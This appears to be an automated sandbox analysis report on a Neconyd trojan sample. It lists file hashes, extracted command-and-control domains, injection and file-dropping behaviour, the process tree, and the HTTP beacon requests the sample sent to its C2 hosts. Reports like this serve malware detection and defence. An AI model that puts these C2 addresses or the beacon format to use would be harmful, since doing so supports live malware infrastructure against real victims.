Analysis

  • max time kernel
    115s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250129-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    01/02/2025, 15:01 UTC

General

  • Target
    46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe
  • Size
    96KB
  • MD5
    5a4e24466068994c8d2993885c234630
  • SHA1
    71ad823076f84943e7a84b18170620604c222816
  • SHA256
    46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609a
  • SHA512
    e63ba08d8b70e3fb81ec7556f9210600964a633a7920579fe9bbff0bca370b83b88e5abab7ee1910db82caa929787109b4138b02af9f7ff9f199e957641ce07b
  • SSDEEP
    1536:OnAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxxB:OGs8cd8eXlYairZYqMddH13B

Malware Config

Extracted

  • Family
    neconyd
  • C2
    http://ow5dirasuek.com/
    http://mkkuei4kdsz.com/
    http://lousta.net/

Signatures

  • Neconyd

    Neconyd is a trojan written in C++.

  • Neconyd family
  • Executes dropped EXE 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe
    "C:\Users\Admin\AppData\Local\Temp\46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1140
    • C:\Users\Admin\AppData\Local\Temp\46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe
      C:\Users\Admin\AppData\Local\Temp\46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Users\Admin\AppData\Roaming\omsecor.exe
        C:\Users\Admin\AppData\Roaming\omsecor.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Users\Admin\AppData\Roaming\omsecor.exe
          C:\Users\Admin\AppData\Roaming\omsecor.exe
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4932
          • C:\Windows\SysWOW64\omsecor.exe
            C:\Windows\System32\omsecor.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3188
            • C:\Windows\SysWOW64\omsecor.exe
              C:\Windows\SysWOW64\omsecor.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2412
              • C:\Users\Admin\AppData\Roaming\omsecor.exe
                C:\Users\Admin\AppData\Roaming\omsecor.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3160
                • C:\Users\Admin\AppData\Roaming\omsecor.exe
                  C:\Users\Admin\AppData\Roaming\omsecor.exe
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3988
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 256
                  8⤵
                  • Program crash
                  PID:3544
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 292
              6⤵
              • Program crash
              PID:4148
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 292
          4⤵
          • Program crash
          PID:1732
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 288
      2⤵
      • Program crash
      PID:100
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1140 -ip 1140
    1⤵
      PID:1536
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1836 -ip 1836
      1⤵
        PID:832
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3188 -ip 3188
        1⤵
          PID:4512
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3160 -ip 3160
          1⤵
            PID:3768

Network

  • DNS lousta.net IN A (omsecor.exe) → 8.8.8.8:53; response: 193.166.255.171
  • DNS 73.159.190.20.in-addr.arpa IN PTR → 8.8.8.8:53; response: (empty)
  • DNS 172.210.232.199.in-addr.arpa IN PTR → 8.8.8.8:53; response: (empty)
  • DNS 55.36.223.20.in-addr.arpa IN PTR → 8.8.8.8:53; response: (empty)
  • DNS 18.31.95.13.in-addr.arpa IN PTR → 8.8.8.8:53; response: (empty)
  • DNS 50.23.12.20.in-addr.arpa IN PTR → 8.8.8.8:53; response: (empty)
  • DNS mkkuei4kdsz.com IN A (omsecor.exe) → 8.8.8.8:53; response: 3.33.243.145, 15.197.204.56
  • HTTP GET http://mkkuei4kdsz.com/695/948.html (omsecor.exe) → 3.33.243.145:80
    Request:
    GET /695/948.html HTTP/1.1
    From: 133828956914329070
    Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B27547;65hbf>f:fg7:87i1=f:j556<f<
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive
    Response:
    HTTP/1.1 200 OK
    content-type: text/html
    date: Sat, 01 Feb 2025 15:02:35 GMT
    content-length: 114
  • DNS 145.243.33.3.in-addr.arpa IN PTR → 8.8.8.8:53; response: a3edc0dabdef92d6d.awsglobalaccelerator.com
  • DNS ow5dirasuek.com IN A (omsecor.exe) → 8.8.8.8:53; response: 52.34.198.229
  • HTTP GET http://ow5dirasuek.com/295/829.html (omsecor.exe) → 52.34.198.229:80
    Request:
    GET /295/829.html HTTP/1.1
    From: 133828956914329070
    Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B27547;65hbf>f:fg7:87i1=f:j556<f<
    Host: ow5dirasuek.com
    Connection: Keep-Alive
    Response:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 01 Feb 2025 15:02:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d3eea329e99cb093c7076d8ec3e83f87|181.215.176.83|1738422165|1738422165|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • DNS 229.198.34.52.in-addr.arpa IN PTR → 8.8.8.8:53; response: ec2-52-34-198-229.us-west-2.compute.amazonaws.com
  • DNS 14.227.111.52.in-addr.arpa IN PTR → 8.8.8.8:53; response: (empty)

Connections

  • 193.166.255.171:80 (lousta.net), omsecor.exe: 260 B / 5 packets sent
  • 193.166.255.171:80 (lousta.net), omsecor.exe: 260 B / 5 packets sent
  • 3.33.243.145:80 (http://mkkuei4kdsz.com/695/948.html), http, omsecor.exe: 467 B / 6 packets sent, 388 B / 4 packets received
    HTTP Request: GET http://mkkuei4kdsz.com/695/948.html
    HTTP Response: 200
  • 52.34.198.229:80 (http://ow5dirasuek.com/295/829.html), http, omsecor.exe: 467 B / 6 packets sent, 623 B / 5 packets received
    HTTP Request: GET http://ow5dirasuek.com/295/829.html
    HTTP Response: 200
  • 193.166.255.171:80 (lousta.net), omsecor.exe: 260 B / 5 packets sent
  • 193.166.255.171:80 (lousta.net), omsecor.exe: 156 B / 3 packets sent
  • 8.8.8.8:53 (lousta.net), dns, omsecor.exe: 56 B / 1 packet sent, 72 B / 1 packet received
    DNS Request: lousta.net
    DNS Response: 193.166.255.171
  • 8.8.8.8:53 (73.159.190.20.in-addr.arpa), dns: 72 B / 1 packet sent, 158 B / 1 packet received
    DNS Request: 73.159.190.20.in-addr.arpa
  • 8.8.8.8:53 (172.210.232.199.in-addr.arpa), dns: 74 B / 1 packet sent, 128 B / 1 packet received
    DNS Request: 172.210.232.199.in-addr.arpa
  • 8.8.8.8:53 (55.36.223.20.in-addr.arpa), dns: 71 B / 1 packet sent, 157 B / 1 packet received
    DNS Request: 55.36.223.20.in-addr.arpa
  • 8.8.8.8:53 (50.23.12.20.in-addr.arpa), dns: 70 B / 1 packet sent, 156 B / 1 packet received
    DNS Request: 50.23.12.20.in-addr.arpa
  • 8.8.8.8:53 (18.31.95.13.in-addr.arpa), dns: 70 B / 1 packet sent, 144 B / 1 packet received
    DNS Request: 18.31.95.13.in-addr.arpa
  • 8.8.8.8:53 (mkkuei4kdsz.com), dns, omsecor.exe: 61 B / 1 packet sent, 93 B / 1 packet received
    DNS Request: mkkuei4kdsz.com
    DNS Response: 3.33.243.145, 15.197.204.56
  • 8.8.8.8:53 (145.243.33.3.in-addr.arpa), dns: 71 B / 1 packet sent, 127 B / 1 packet received
    DNS Request: 145.243.33.3.in-addr.arpa
  • 8.8.8.8:53 (ow5dirasuek.com), dns, omsecor.exe: 61 B / 1 packet sent, 77 B / 1 packet received
    DNS Request: ow5dirasuek.com
    DNS Response: 52.34.198.229
  • 8.8.8.8:53 (229.198.34.52.in-addr.arpa), dns: 72 B / 1 packet sent, 135 B / 1 packet received
    DNS Request: 229.198.34.52.in-addr.arpa
  • 8.8.8.8:53 (14.227.111.52.in-addr.arpa), dns: 72 B / 1 packet sent, 158 B / 1 packet received
    DNS Request: 14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\omsecor.exe
    Filesize: 96KB
    MD5: 5f78c8acd8d7a3c783977b7f65ed2124
    SHA1: 95dbbb6ce4854675e025b91adcd9a5f6866c932d
    SHA256: 3c3037c0182e088a172c2e7d57cea99d8d545fb7bd331ad2e35b2b11b0ead1d1
    SHA512: b0d886e88c5648e08626105a298a09e5b70a3a499e8b403b0866fe34f846995eaaa5cf05959c7587fe57ae2b50c8ca3dedc83bff98cb0b28482ab23dd2f1c594
  • C:\Users\Admin\AppData\Roaming\omsecor.exe
    Filesize: 96KB
    MD5: ec89c35902924c7111030966fac9ce59
    SHA1: 889457a38e68934db34638a0c3fe4050ce9bb516
    SHA256: 268444a3dcfa24c1666b7e056a38f4cc86720a2bd6204175f2ed2d0d0d1917f3
    SHA512: c0d45398d2b8951a7817b4a3730c5ca0228ecb20892d55683955e149baf277b768e30e653917436f8e9d8ea561aca9cd19e9a1567541e49b5c76546d8f96f362
  • C:\Windows\SysWOW64\omsecor.exe
    Filesize: 96KB
    MD5: 3a453926a9b59232f7acd36daadd36b5
    SHA1: 3d77f56b7a25a73a87f0a091667f684bb47c7fa8
    SHA256: 9d9e1544e5160deff579c143fe0ef1e01962db7341c075dcfea86947d9c16cbd
    SHA512: 08c1116200b7b5d3b57337ea47aa7448252d98611fc69f85da097c571a51e034d7196bf92e61059b562c8dafeda605e1266b7da003d7fb2d4efa0b3a1a1362e9

Memory dumps

  • memory/1016-3-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/1016-1-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/1016-2-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/1016-6-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/1140-0-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/1140-18-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/1836-17-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/1836-10-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/2412-38-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/2412-40-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/2412-37-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/3160-45-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/3160-52-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/3188-53-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/3188-34-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/3988-50-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/3988-49-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/3988-54-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/4932-15-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/4932-33-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/4932-26-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/4932-25-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/4932-22-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/4932-19-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
  • memory/4932-14-0x0000000000400000-0x0000000000429000-memory.dmp (164KB)
